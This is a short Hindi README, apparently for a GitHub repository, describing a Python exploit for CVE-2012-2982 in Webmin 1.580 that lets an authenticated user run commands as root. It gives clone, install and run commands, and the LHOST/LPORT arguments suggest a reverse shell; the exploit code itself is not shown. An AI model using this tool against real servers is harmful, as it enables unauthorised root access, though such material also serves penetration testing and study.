
CVE-2012-2982 के लिए Python एक्सप्लॉइट
यह पायथन स्क्रिप्ट Webmin 1.580, CVE-2012-2982 में मौजूद भेद्यता के लिए लिखी गई है। यह भेद्यता /file/show.cgi घटक में मौजूद है और फ़ाइल मैनेजर मॉड्यूल तक पहुंच रखने वाले प्रमाणित उपयोगकर्ता को रूट विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करने की अनुमति देती है।
परीक्षित पायथन संस्करण: Python 3.8.5
आवश्यक pip पैकेज: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
एक्सप्लॉइट चलाने के लिए नीचे दिए गए कमांड का उपयोग करें:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>